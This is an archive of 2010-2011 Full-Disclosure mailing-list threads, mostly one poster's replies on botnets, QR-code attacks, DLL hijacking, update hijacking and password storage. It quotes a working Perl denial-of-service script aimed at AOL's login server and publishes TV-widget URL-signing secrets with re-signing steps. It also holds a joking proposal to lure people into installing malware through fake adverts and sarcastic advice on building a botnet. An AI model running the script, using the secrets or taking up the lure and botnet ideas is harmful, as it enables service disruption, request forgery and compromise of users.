Re: [Full-disclosure] understanding the botnet C&C..

2011-09-20 Thread T Biehn
There were some trojans back in the day that would imitate normal browsing
(proxying cnn.com for instance) and it'd stuff encrypted command packets
in there.
Combine that with a load balancing check-back time in the response, you can
probably support a very large number of bots on a single webserver.

-Travis

On Sat, Sep 17, 2011 at 8:10 PM, Corey Nachreiner 
corey.nachrei...@watchguard.com wrote:

 This basic video series may help:


 http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-one.asp

 http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-two.asp

 http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-three.asp

 http://www.watchguard.com/tips-resources/video-tutorials/botnet-source-code-for-overachievers.asp

 That said, we made that ages ago. It is quite dated. Most modern botnets
 have started to use HTTP C&C channels, often encrypted. They also sometimes
 obfuscate their C&C via proxies and p2p. Leaked source code for Zeus and
 SpyEye probably would provide a better idea of how modern botnets work.

 Cheers,

 Corey Nachreiner, CISSP | Senior Network Security Strategist
 WatchGuard Technologies, Inc. | www.watchguard.com

 206.613-0873 Direct
 206.227.6905 Mobile
 corey.nachrei...@watchguard.com

 Office Hours: 9:15 AM to 6:15 PM Pacific (GMT-8), Mon - Fri

 Better be despised for too anxious apprehensions, than ruined by too
 confident security. - Edmund Burke
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 WatchGuard: Stronger Security, Simply Done


 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk [mailto:
 full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM
 Sent: Friday, September 16, 2011 8:38 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] understanding the botnet C&C..

 hi
 an area that I am basically stupid on is botnets. Not what they are
 but how they work through IRC as the control center. Not just that
 but the various modern programs used. I am aware for instance LOIC can
 be used to connect to an IRC channel.. but, how then does the herder
 do the job from IRC..how does he issue commands that all the computers
 connected act upon, etc. ? My curiosity has just got the best of me
 and I would like some pointers to good material that can feed it.

 Sorry for the troll like post but I really would like to understand
 this further. Have done a number of Google searches but have hope
 someone here has done personal research.

 --
 been great, thanks
 RandyM
 a.k.a System

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Using QR tags to Attack SmartPhones (Attaging)

2011-09-20 Thread T Biehn
I like the idea of advertising a 'free * for your phone' around interesting
targets, perhaps posting fake adverts in the DC subway system? I think
people will trust print more than web and jump at the opportunity to scan
and install anything.

-Travis


On Sun, Sep 11, 2011 at 12:04 AM, Augusto Pereyra aepere...@gmail.com wrote:

 I'd like to share this paper with all.

 English version

 http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones_10.html

 Version en español

 http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones.html

 Thanks to all


-- 
Twitter https://twitter.com/#%21/tbiehn |
LinkedIn http://www.linkedin.com/in/travisbiehn |
TravisBiehn.com http://www.travisbiehn.com

Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

2011-08-10 Thread T Biehn
Maybe he should build a vulnerability into each version, so he can announce
each new version with the disclosure and satisfy your constraints.

-Travis

On Wed, Aug 10, 2011 at 10:44 AM, Steven Pinkham steve.pink...@gmail.com wrote:

 valdis.kletni...@vt.edu wrote:
  On Tue, 02 Aug 2011 22:17:58 -0300, root said:
  Dude you just released INSECT Pro 2.7 less than a week ago. I swear to
  god I'm being serious.
 
  It's not unusual for commercial products with customers that demand product
  stability to release version 3.5 or whatever, then release 3.6, and after that
  release 3.5.1, 3.5.2, yadda yadda with just bugfixes so sites can get patched
  without having to make the 3.5-3.6 jump.

 Yes.  But they don't spam full-disclosure with that info every week.
 Rapid releases can be good, but the list charter says:

 Gratuitous advertisement, product placement, or self-promotion is
 forbidden.

 Announcing every point release of a commercial product falls afoul of
 that.
 --
  | Steven Pinkham, Security Consultant|
  | http://www.mavensecurity.com   |
  | GPG public key ID CD31CAFB |



Re: [Full-disclosure] new anon tool

2011-08-03 Thread T Biehn
nothing.

On Wed, Aug 3, 2011 at 5:08 PM, RandallM randa...@fidmail.com wrote:

 have you heard much about the #RefRef tool? What's so unique and hasn't
 been done or tried before?

 --
 been great, thanks


Re: [Full-disclosure] (fractal-Self__) : A theoretical introduction to Universe, Conscious Machines and Programming Ur-cells !!!

2011-06-13 Thread T Biehn
tl;dr
ACID IS A LOT OF FUN AMIRITE?

-TRAVIS

On Sun, Jun 12, 2011 at 8:36 PM, Christian Sciberras uuf6...@gmail.com wrote:

 Fractal fractal fractal, even us that coined the concept can't keep it
 going forever.
 Seems evident that each subsystem loses key aspects of its parent, this
 might turn out to be a system flaw, or a constrained space.
 We might have discovered this flaw already and we might have been using all
 this time since nothing tells us the laws of our universe are true to its
 container (if at all).

 Chris.



 On Sun, Jun 12, 2011 at 10:13 PM, Michal Zalewski lcam...@coredump.cx wrote:

  Paradox are way of life... Hence, the goal here is to question every
  knowledge with reasoning and trying-not to build a static opinion on
  anything.

 But have you tried contacting the vendor first?

 /mz


Re: [Full-disclosure] LulzSec EXPOSED!

2011-06-06 Thread T Biehn
LOL @
A timing attack on ssh passwords over the net?

and

I think it's just a bruteforce.

-Travis

On Mon, Jun 6, 2011 at 7:58 AM, Gichuki John Chuksjonia 
chuksjo...@gmail.com wrote:

 I think it's just a bruteforce.




 On 6/6/11, Andreas Bogk andr...@andreas.org wrote:
  Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
  Lulzsec == pwnt
 
  I've seen the log you pasted to pastebin.  Is this:
 
   * A timing attack on ssh passwords over the net?
   * Fake, to distract us from your real 0day?
 
  Andreas
 
  Log:
 
  root@gibson:~# ./1337hax0r 204.188.219.88 -root
  Attempting too hax0r root password on 204.188.219.88
 
  h,VhXzavMm
  3xLl1-_\wC
  ffsakTgyc~H
  ZZrz,pJrgB
  b{4Bv_Y$$Z6
  XDh;vDU-;3
  FB-hvg%g_'t
  }qHNvkS'g
  RNBKvUi5yO|
  z`(}v1^u
  *V4?vh9#^f2
  /R*9vfhZ#
  9P65vjKhh.N
  \rfsv~PhNDz
 Bfpv|uhGpy
  J%kvf]hGf0
  sY0v{2hf7p
 9dev%Qh6_v
  *Tbv7?h.**
  }:lkvV^hN2U
  ;5Xv'Sh#}_
  MOqpvi_hg+#
  Md9/viVhu7
  M(%rvomhb'
  MI5v_shEVe
  M=@?vl.hZge
  MPk5v:WhUTe
  M=3vvrzh7Te
  M'?v]sh`Te
  M/Z,vI1h`Te
  M.9vO$hTTe
  Ms!(vY;hpTe
  MA)SvYLhnTe
  M7eCv@Lh0Te
  MkeCvFLh$Te
  M'eCv?LhaTe
  MeCvLLh|Te
  M*eCv5Lh\Te
  MmeCvcLhCTe
  MTeCvLhrTe
  M,eCv1LhYTe
  MEeCv}LhHTe
  M_eCvSLhnTe
  MPeCvSLh+Te
  M[eCvSLh,Te
  MOeCvSLhTe
  M7eCvSLhTe
  MGeCvSLhdTe
  M$eCvSLhkTe
  MCeCvSLhkTe
  MLeCvSLhkTe
  M=eCvSLhkTe
  M-eCvSLhkTe
  MweCvSLhkTe
  M=eCvSLhkTe
  M3eCvSLhkTe
  M6eCvSLhkTe
  MreCvSLhkTe
  M6eCvSLhkTe
  MFeCvSLhkTe
  MSeCvSLhkTe
  M8eCvSLhkTe
 
  Password hax0rd! root password: M8eCvSLhkTe
 
  root@gibson:~# ssh 204.188.219.88
 
  root@204.188.219.88's password:
 
  root@xyz:~# hostname; id; w
  xyz
  uid=0(root) gid=0(root) groups=0(root)
 


 --
 --
 Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
 I.T Security Analyst and Penetration Tester
 jgichuki at inbox d0t com

 {FORUM}http://lists.my.co.ke/pipermail/security/
 http://chuksjonia.blogspot.com/


Re: [Full-disclosure] LulzSec EXPOSED!

2011-06-06 Thread T Biehn
Will you be presenting at BlackHat?

-Travis

On Mon, Jun 6, 2011 at 9:57 AM, Benji m...@b3nji.com wrote:

 (picture found by looking through dir)


 On Mon, Jun 6, 2011 at 2:54 PM, Andreas Bogk andr...@andreas.org wrote:

 Excerpts from Benji's message of Mo Jun 06 15:32:11 +0200 2011:
  http://89.248.164.63/dox/xyz/20.png

 Ah, that's a much saner explanation. :)

 Andreas


Re: [Full-disclosure] Some magic secrets.

2011-05-23 Thread T Biehn
Yeah these are Yahoo TV Widget url signing keys for Samsung & LG devices,
they are used together with a timestamp to prevent you from grabbing other
people's widgets/spoofing devices. If you fire up Wireshark while you're
poking at these TVs you'll see some calls to Yahoo services ending in
&sign=

url = http://yahoo?1=a&2=b&3=c
url = url+&sign=md5(url+Secret)

Update the ts (timestamp in msecs) parameter, resign, post & play.
Interesting to look at the various widgets & sources, none of them have any
form of obfuscation applied to the javascript, could be useful in finding
and exploring unknown APIs :)

-Travis

On Thu, Mar 10, 2011 at 3:18 PM, Ryan Sears rdse...@mtu.edu wrote:

 Hrm

 Could this have something to do with this = http://pastebin.com/rD8hwpxT? :-P

 As far as 'magic secrets' go, either disclose something or don't. Then move
 on, personally I think posting cryptic messages to a public forum like this
 is a bit dumb. If you're trying to say something, just say it.

 Ryan

 - Original Message -
 From: T Biehn tbi...@gmail.com
 To: full-disclosure Full-Disclosure@lists.grok.org.uk
 Sent: Thursday, March 10, 2011 1:22:50 PM GMT -05:00 US/Canada Eastern
 Subject: [Full-disclosure] Some magic secrets.

 SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY-
 L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU-
 SO:?
 V:?

 Do the replace live: value key=gallery.gallery-urllocalhost/value


 Also,
 First!

 -Travis
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
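
An added example, not part of the original thread and not Yahoo's or any vendor's code: a server-side verifier for the signing construction described in the message above (MD5 over the URL plus a secret shared by every device, with a `ts` timestamp), next to a variant that uses HMAC-SHA256 with a per-device key. The host name, the `device` parameter, all key values and the five-minute freshness window are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# All values below are constructed for illustration.
SHARED_SECRET = b"constructed-shared-secret"   # identical in every device
MASTER_KEY = b"constructed-server-master-key"  # stays on the server
MAX_SKEW_MS = 5 * 60 * 1000                    # assumed freshness window


def md5_tag(url, secret=SHARED_SECRET):
    """Tag from the post: md5(url + Secret), hex encoded."""
    return hashlib.md5(url.encode() + secret).hexdigest()


def device_key(device_id):
    """Per-device key derived server-side and provisioned to one device."""
    return hmac.new(MASTER_KEY, device_id.encode(), hashlib.sha256).digest()


def hmac_tag(url, key):
    """Variant tag: HMAC-SHA256 over the URL under a per-device key."""
    return hmac.new(key, url.encode(), hashlib.sha256).hexdigest()


def sign_md5(url):
    return url + "&sign=" + md5_tag(url)


def sign_hmac(url, key):
    return url + "&sign=" + hmac_tag(url, key)


def verify(signed_url, now_ms, scheme):
    """Return (ok, reason) for a signed URL under scheme 'md5' or 'hmac'."""
    base, sep, sig = signed_url.rpartition("&sign=")
    if not sep:
        return False, "missing signature"
    query = parse_qs(urlsplit(base).query)
    try:
        ts = int(query["ts"][0])
        device_id = query["device"][0]
    except (KeyError, ValueError):
        return False, "missing ts or device"
    if scheme == "md5":
        expected = md5_tag(base)
    elif scheme == "hmac":
        # The key is looked up from the claimed device id, so a tag made
        # with another device's key does not verify.
        expected = hmac_tag(base, device_key(device_id))
    else:
        raise ValueError("unknown scheme: " + scheme)
    # Constant-time comparison of the two tags.
    if not hmac.compare_digest(expected.encode(), sig.encode()):
        return False, "bad signature"
    # The timestamp is covered by the tag; reject requests outside the window.
    if abs(now_ms - ts) > MAX_SKEW_MS:
        return False, "stale timestamp"
    return True, "ok"


if __name__ == "__main__":
    now = 1_300_000_000_000  # constructed clock value, msecs
    url_a = f"http://widgets.example/list?device=tv-A&ts={now}"
    url_b = f"http://widgets.example/list?device=tv-B&ts={now}"
    print("md5, fresh:          ", verify(sign_md5(url_a), now, "md5"))
    print("md5, replayed later: ", verify(sign_md5(url_a), now + MAX_SKEW_MS + 1, "md5"))
    # With one secret in every device, the tag cannot tell devices apart.
    print("md5, other device id:", verify(sign_md5(url_b), now, "md5"))
    print("hmac, own key:       ", verify(sign_hmac(url_a, device_key("tv-A")), now, "hmac"))
    print("hmac, wrong key:     ", verify(sign_hmac(url_b, device_key("tv-A")), now, "hmac"))
```
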

Re: [Full-disclosure] psnhack - playstation network hack

2011-05-01 Thread T Biehn
I'm pretty sure the ps3dev crowd aren't responsible for any sort of breach
of Sony's servers. But, I guess, if you didn't understand what they were
talking about you'd see 'hack' and 'psn'.

-Travis

2011/5/1 アドリアンヘンドリック unixfreaxj...@gmail.com

 Dear operators of Full disclosure,

 Please do not make the below message to be up in the maillist.
 The link which contains translation text is currently being used by
 what so called anonymous and they put it in their site.
 I am really angry and frustrated for it, and erasing the text file in
 my server now.
 Sorry for the inconvenience.

 On Sun, May 1, 2011 at 9:22 PM, ZeroDay.JP unixfreaxj...@gmail.com
 wrote:
  Just having some additional info to share regardingly. Sorry for interrupt.
 
  In Japan people were very patient to wait for announce from Sony, while in
  heart worried so much.
  It was 27th just a day before summer holiday here when the announce came ..
  I got to hold the phone for 3hours to passed thru to cancel all cards.
 
  Today I was watching the whole Sony news conference and writing it in text
  word by word then took time to translate to English. The reporters here was
  presenting the user's feelings very well, and I really respect them a lot,
  they cleverly cornered Mr. Hirai's team with very logical questions.
  Access for the QA text is here... http://0day.jp/data/PSN.txt
 
  I hope this list allowed this message to pass through, for I got a strong
  sense that maybe I cannot hold the the text uptime for too long.
 
  Best regards,
  ---
  Hendrik ADRIAN
  ZeroDay Japan http://0day.jp
  Twit: @unixfreaxjp, blog: ZeroDay.JP http://unixfreaxjp.blogspot.com
 
 
 
 
  Sent to you by ZeroDay.JP via Google Reader:
 
 
 
 
  Re: psnhack - playstation network hack
 
  via Full Disclosure on 5/1/11
 
  Posted by Peter Osterberg on May 01
 
  In Sweden they did that 14 days after they got hacked, and at the same
  time informed us that we should pay attention to weird things happening
  on our bank accounts...
 
  LOL, it's fucking lame to come out with that warning 14 days after it
  happened... Quite obvious that they wanted to bury the whole thing...
 
  Thor (Hammer of God) skrev 2011-04-30 19:13:
 
 
 
 

Re: [Full-disclosure] password.incleartext.com

2011-04-06 Thread T Biehn
I sent this only to Romain,
Some other posters wanted to know the other scenarios.

-Travis

-- Forwarded message --
From: T Biehn tbi...@gmail.com
Date: Wed, Apr 6, 2011 at 10:33 AM
Subject: Re: [Full-disclosure] password.incleartext.com
To: Romain Bourdy achil...@gmail.com


The only scheme where there's a semblance of security is if the decryption
key was stored in memory only. (Provided on startup perhaps?)

Or the server stores a one way hash of the password for verification, then
the encrypted version, and queues them up on the X for decryption, an admin
grabs the packet and decrypts locally.

Neither of those schemes are likely to have been implemented on any site,
ever.

In which case plain-text is equivalent to encrypted text with an easily
recoverable key.

-Travis


On Wed, Apr 6, 2011 at 10:01 AM, Romain Bourdy achil...@gmail.com wrote:

 Hi Full-Disclosure,

 Just my two cents but ... the fact they can give your password back doesn't
 mean it's stored in cleartext, just that it's not hashed but encrypted with
 some way to get the original data back, this doesn't mean at all it's not
 secured, even though in most cases it's not.

  -Romain


 On Wed, Apr 6, 2011 at 1:36 PM, maksim.file...@fuib.com wrote:

 Kinda plaintextoffenders.com?

 wbr,
  - Max

 full-disclosure-boun...@lists.grok.org.uk wrote on 01.04.2011 02:17:24:

  Inc leartext st...@incleartext.com
  Sent by: full-disclosure-boun...@lists.grok.org.uk
 
  01.04.2011 13:14
 
  To
 
  full-disclosure@lists.grok.org.uk
 
  cc
 
  Subject
 
  [Full-disclosure] password.incleartext.com
 
  Hi FD,
 
  Just launched a new website to keep a list of websites storing
  passwords in clear text, so far the database is small but feel free
  to add some:
  http://password.incleartext.com/

 
  Cheers,
  Inc Leartext

[Full-disclosure] Some magic secrets.

2011-03-10 Thread T Biehn
SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY-
L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU-
SO:?
V:?

Do the replace live: value key=gallery.gallery-urllocalhost/value


Also,
First!

-Travis

[Full-disclosure] Anyone on list have a Samsung TV w/ Yahoo TV Widgets?

2011-03-04 Thread T Biehn
Working on something, I'm wondering about a few settings on Sammy's vs LG
tvs for YTV.

Shoot me an e-mail if you're interested!

-Travis


Re: [Full-disclosure] DOS AOL AIM via perl

2010-12-14 Thread T Biehn
You need at minimum 2x the number of IPs your target has to take it down.
Via proxies, bots, whatever.

Targets can implement per IP throttling/blacklisting. Which means you need
more IPs than that.

IIRC Aol throttles connection attempts.

-Travis

On Tue, Dec 14, 2010 at 10:13 AM, Cyber Flash cyber_fl...@hotmail.com wrote:

   Create many ESTABLISHED connections (60,000) to login.oscar.aol.com server
 and then temporarily disable the local client gateway, close the sockets
 (the RST packets aren’t sent to AOL), reopen the gateway and repeat this
 process.

  Anyone have ideas on the pros/cons of using this technique?

 # Client - Server [SYN]
 # Server - Client [SYN, ACK]
 # Client - Server [ACK]
 # Server - Client 10 bytes (conn_ack)
 # Client - Server 10 bytes (conn_ack)
 # Server - Client [ACK]

 use IO::Socket;
 use Thread;
 use Win32::OLE qw(in);

 # --- SCRIPT CONFIGURATION ---
 my $host=login.oscar.aol.com;
 my $port=80;

 # --- END CONFIGURATION ---
 my $ip=;
 my $gateway=;
 my $fake_gateway=1.1.1.1;
 my $mask=;
 my $adpater=;
 my $alive=0;


 $object=Win32::OLE-GetObject('winmgmts:{impersonationLevel=impersonate}!//.');
 foreach my
 $nic(in$object-InstancesOf('Win32_NetworkAdapterConfiguration')){
next unless $nic-{IPEnabled};
$...@{$nic-{IPAddress}}[0];
$gatew...@{$nic-{DefaultIPGateway}}[0];
$ma...@{$nic-{IPSubnet}}[0];
print IPv4 Address: $ip\nDefault Gateway: $gateway\nSubnet Mask:
 $mask\n;
last;
 }

 $objWMI = Win32::OLE-GetObject(winmgmts://./root/cimv2);
 $colNAs = $objWMI-InstancesOf('Win32_NetworkAdapter');
 foreach my $objNA (in $colNAs){
next unless $objNA-{NetEnabled};
$adapter=$objNA-NetConnectionID;
print Ethernet Adapter: $adapter\n;
last;
 }

 while (1) {
for ($n=0;$n=3000;$n++){
   $thr=new Thread\connect;
   $thr-detach;
   $t++;
   print Connection: $t\n;
   select(undef, undef, undef, 0.25);
}
print \nDisabling Gateway...\n;
system(netsh interface ip set address name=\$adapter\ static $ip
 $mask $fake_gateway 1);
$alive=1;
sleep 3;
print \nEnabling Gateway\n;
system(netsh interface ip set address name=\$adapter\ static $ip
 $mask $gateway 1);
$alive=0;
 }

 sub connect{
   my $socket =
 IO::Socket::INET-new(Proto=tcp,PeerAddr=$host,PeerPort=$port);
   $socket-recv($data,10);
   $socket-send($data);
   while ($alive==0) {sleep 1;}
 }


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-11-02 Thread T Biehn
a+ troll.

-Travis

On Sun, Oct 31, 2010 at 9:24 AM, Christian Sciberras uuf6...@gmail.com wrote:

 Only thing, there's the danger of someone using stolen certificates.
 But I'm sure there's another fix for that.

 In my opinion, all in all, you're creating a yet another overly complex
 system with as yet more possible flaws.
 Don't forget that each new line of code is a potential attack vector which
 affects any system.

 Just my 2 cents...

 Chris.



 On Sun, Oct 31, 2010 at 1:09 PM, Mario Vilas mvi...@gmail.com wrote:

 Just signing the update packages prevents this attack, so it's not that
 hard to fix.

 On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote:

 On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said:
  It's now a time for vendors to re-consider their updating scheme.

 And do what differently, exactly?

 OK, so it's *possible* to fake out the iTunes update process.  But which is
 easier and more productive:

 A) Laying in wait for some random to think Wow, I should update iTunes and
 hijack the process.

 B) Send out a few hundred thousand spam with a
 'From: upd...@apple-itunes-support.com'
 with a link to a site you control and feed the sheep some malware.

 Evilgrade looks like a nice tool to have if you're doing a pen test or a
 targeted attack and can somehow get the victim to do an update (possibly
 social engineering), but for any software vendor feeding software updates to
 Joe Sixpack this threat model is *so* far down the list it isn't funny.
 Simply compare the number of boxes pwned by (A) and (B) - how many people
 have gotten pwned because somebody hijacked their update from Symantec or
 wherever, compared to the number pwned because they got a popup that said
 Your computer is infected, click here to fix it?

 Remember - just because a new tool useful for an attacker shows up, does
 *not* mean it's a game changer for the industry at large.



 --
 HONEY: I want to… put some powder on my nose.
 GEORGE: Martha, won’t you show her where we keep the euphemism?


Re: [Full-disclosure] DLL hijacking POC (failed, see for yourself)

2010-09-16 Thread T Biehn
Shit man, I was keeping notes for my class in pedantry, can't you two keep
it going for a few more days?

-Travis

On Wed, Sep 15, 2010 at 7:19 PM, Stefan Kanthak stefan.kant...@nexgo.de wrote:

 Christian Sciberras wrote:

  Yes. Once again: get your homework done!
 
  http://www.codeproject.com/KB/DLL/dynamicdllloading.aspx
 
  That's a double DYNAMIC there!
 
  Did you even bother to read the article? The very first paragraph
  states the difference between the two.
 
  Oh, and for the records, you can't statically link to dll files. At
  least, not in the way you're imagining.

 You should start to read what I wrote in
 34a088424c7d499f988d1adca645b...@localhost:

 | Static linking occurs when the linker builds a binary (this might be a
 | DLL.-) using *.OBJ and *.LIB.

  Static linking (in your case) only works for object files (.o or .lib).

 I wrote that already.

  Why should I bother to do the work of the loader?
  I reference the DLL export in my code and expect the loader to resolve
  it. There is no need for fancy do-it-yourself DLL entry resolution!
 
  Forfuckssake where did this point come from?

 Your completely superfluous trip to codeproject.com!

  Nobody can load a DLL that does not exist!
 
  Wow what genius! The hell with that. It's the practice that is wrong.
  As the saying goes, one shouldn't cry over spilled milk;
  attempting to load a non-existent is asking for trouble.
 
  Oh, and by the way. Looks like MS just broke your little fact...
  ...they've been loading an nonexistent dll via ACROS' POC (via wab.exe).

 Bloody wrong: the .DLL accompanies the *.VCF in the share.

  Why should I call or even write a routine which checks whether a DLL
  exists instead of just calling the loader and let it search/load it?
  Hint #1: this is exactly what MSFT advises NOT to do!
 
  And they are right. You shouldn't be doing the OS's work.
 
  Hint #2: loading a DLL does not mean to run any code from this DLL!
 
  But it is still loading the library into memory.

 That's what I expect when loading a DLL.

  From there on, perhaps, some buffer overflow exploit would escalate the
 issue.

 Which issue? Ever heard of Occams Razor?!

  At which point we all go critical over the damn crap just like you're
  doing right now.

 Why? You wrote that your self-written POC failed!
 ACROS' POC but works. Who's wrong?

  Who guarantees that your self-written or the OS supplied search routine
  will find the same DLL as the loader (just in case you do not use the
  fully qualified pathname of the DLL)?
 
  Because that is the damn point of the function, to tell us what the
  hell the loader is doing!!

 Which function then tells me what your function is doing?
 LoadLibrary*() IS documented, and its rather well documented.
 There's no need to reprogram it. Just use it. And check its return code!

  Why should someone with a sane mind let a program (or the OS) search
  a DLL twice? Just to waste performance?
 
  Why search? A simple CreateFile() (aka FileExists in winapi) over the
  cached path would suffice.

 Which cached path? KISS!
 Remember: for DLL hijacking to work the input to LoadLibrary() needs to
 be a simple filename or a relative pathname.

  Perhaps returning this cached path would completely solve the issue.

 Perhaps. The Win32 API but does not provide such a function!

  For DLLs: always. For EXEs: it depends. Just read it in the MSDN!
 
  Just in case that you misunderstood from the very beginning let me
  rephrase it: from the earliest days of DOS/Windows CWD was in the PATH.
 
  That is NOT true.

 OF COURSE THIS IS TRUE!

  I don't know if it was, perhaps in the Win95 era,
  but it most certainly is not there today.

 %PATH% is ALWAYS equivalent to .;%PATH%

  That was what my POC proved. Did you read the full article? I
  mentioned cases where the bad dll (in CWD) would not be loaded (and an
  error followed instead).
 
  Consult MSDN on the DLL load order.
 
  I don't have to. If you spared one moment from trolling, you might
  have noticed me dumping a list from ProcessMonitor...which clearly
  shows what the dll loading order is.
 
  BTW: Windows' base directory is MSFTs notion of $HOME.
  Use the right terms/words, PLEASE.
 
  Mind not putting words in my mouth? As far as definition goes, a base
  directory is where the source program started from...

 Wrong. That's the application directory.

  that could be a docroot of an index.php file

 Wrong again. *.PHP is no executable file format, but associated to an
 application. See CMD.EXE /K ASSOC .PHP and then FTYPE with the output
 of the ASSOC.

  or C:\Windows for notepad.exe.
  No one said anything about Windows!

 ACROS showed a POC for Windows' address book using a *.VCF and a .DLL
 built for Windows.

  Can I assume that you tested it just like you failed to test your own
  POC?
  SAFER works quite well here (and there too) for about 7 years now.
 
  Tell THAT to ACROS and their POC!
  Why should I care for existence of a 

Re: [Full-disclosure] Virus submission site

2010-09-03 Thread T Biehn
You could set up a website that proxies submissions to virustotal, anubis (so
it's from the future) and retain the executables. Post this website to FD.

You could also deploy a botnet of your own and use them as honeypots then
jack the networks of the lower tier *ircbot fellows to expand your
'honeypot' network.

A good place to start building your whitehat use honeypot/botnet is
scraping dronebl, spambl and IP addresses posted to the IRC-Security mailing
list. (Archive helpfully provided for registered users.)

Once you have a sizable network set up you can start baiting scammers by
offering various services like selling proxy servers, providing bulletproof
hosting and spamming. You can use this supplemental income to quit your day
job and become a full-time vigilante whitehat.

Eventually you'll build a nice portfolio of clients, if any of them becomes
competitive you can just report their information to the appropriate
authorities, this would also be a nice side-channel of income to enable
further whitehat pursuits and make sure you stay firmly in the man's good
books.

-Travis

On Fri, Sep 3, 2010 at 12:25 PM, IndianZ indi...@indianz.ch wrote:

 http://www.offensivecomputing.net/
 - not very structured, but actual stuff
 - registration required

 Cheerz IndianZ

 On 09/03/10 16:58, Christian Sciberras wrote:
  Wish there was a reverse for that... I'm kinda getting tired of running
  honeypots to get a hopefully recent malware.
 
 
  vx-heavens has a nice (but outdated) list. Anyone know about others?
 
 
  Cheers,
  Chris.
 
 
  On Fri, Sep 3, 2010 at 4:48 PM, Hacxx 20 hacx...@gmail.com wrote:
 
  Hi,
 
  Do you have viruses archived? Submit them to all major antivirus companies.
 
  Visit http://virus-submission.tk
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 
 
 
 




-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Windows XP bug

2010-07-07 Thread T Biehn
This is fairly classic, not novel.
Your POC is fairly classic, not novel.

-Travis

On Wed, Jul 7, 2010 at 1:54 PM, BlackHawk hawkgot...@gmail.com wrote:

 Hi list, I recently discovered a very small Windows XP bug, kind of
 useless alone but that could be useful in some scenarios.

 Explanation:

 when you try to access a non-existing directory through the shell command
 cd, XP returns an error (obviously), but if you cd to a non-existing
 directory and move one directory up, you'll not get any error.

 Example:
 ---
 C:\>cd ./somerandomchars  <-- Will give an error
 Impossibile trovare il percorso specificato.

 C:\>cd ./somerandomchars/../  <-- Everything is ok

 C:\>
 ---

 PoC on how to make this thing useful:

 http://www.scribd.com/doc/28080332/Podcast-Generator-1-3-Arbitrary-File-Download-Windows

 Hope this could be useful for you in some way..

 --
 BlackHawk - hawkgot...@gmail.com

 Sent with Gmail

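The behaviour in BlackHawk's post, where `somerandomchars/../` collapses without the missing directory ever being looked up, means a file-serving check cannot rely on a bogus path component causing an error. The following is an added example, not part of the original thread: a lexical containment check using Python's `ntpath`, where `BASE`, `resolve_inside`, `audit` and the sample requests are hypothetical names and constructed inputs.

```python
import ntpath

# Hypothetical download root, for illustration only.
BASE = r"C:\app\media"


def resolve_inside(base: str, user_path: str) -> str:
    """Join user_path onto base and collapse it the way Windows does
    (lexically, without checking that intermediate directories exist),
    then return the result only if it is still under base."""
    drive, rest = ntpath.splitdrive(user_path)
    # Reject C:\x, C:x, \\server\share\x and rooted paths such as \x or /x.
    if drive or rest[:1] in ("\\", "/"):
        raise ValueError("absolute, rooted or drive-qualified path")

    base_norm = ntpath.normpath(base)
    # normpath drops "." and resolves ".." purely on the string, so a
    # non-existing component followed by ".." simply disappears.
    candidate = ntpath.normpath(ntpath.join(base_norm, user_path))

    # Compare whole path components, case-insensitively; a plain
    # startswith() would accept a sibling such as C:\app\media2.
    common = ntpath.commonpath([base_norm, candidate])
    if ntpath.normcase(common) != ntpath.normcase(base_norm):
        raise ValueError("escapes base directory")
    return candidate


def audit(base: str, requests: list[str]) -> dict[str, str]:
    """Map each requested name to its resolved path or a rejection reason."""
    results = {}
    for req in requests:
        try:
            results[req] = resolve_inside(base, req)
        except ValueError as exc:
            results[req] = f"REJECTED: {exc}"
    return results


# Constructed sample requests (not taken from any real log).
SAMPLES = [
    "episode1.mp3",
    "./somerandomchars/../episode1.mp3",  # bogus dir vanishes, stays inside
    "somerandomchars/../../config.php",   # bogus dir vanishes, climbs out
    r"..\media2\x.mp3",                   # sibling directory sharing a prefix
    r"C:\boot.ini",
    r"\boot.ini",
]

if __name__ == "__main__":
    for req, outcome in audit(BASE, SAMPLES).items():
        print(f"{req!r:42} -> {outcome}")
```

The check is lexical only and does not follow junctions or symbolic links under the base directory.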

Re: [Full-disclosure] No anti-virus software? No internet connection

2010-06-24 Thread T Biehn
I wonder if someone writes down all that pseudo-intellectual philosophical
bullshit that is so carefully crafted by FD members (myself included)?
Maybe I should:
???
Profit

-Travis

On Thu, Jun 24, 2010 at 5:45 AM, Walter van Holst 
walter.van.ho...@xs4all.nl wrote:

 On Thu, June 24, 2010 11:08, valdis.kletni...@vt.edu wrote:

  The answer to that kind of question is quite often related to the
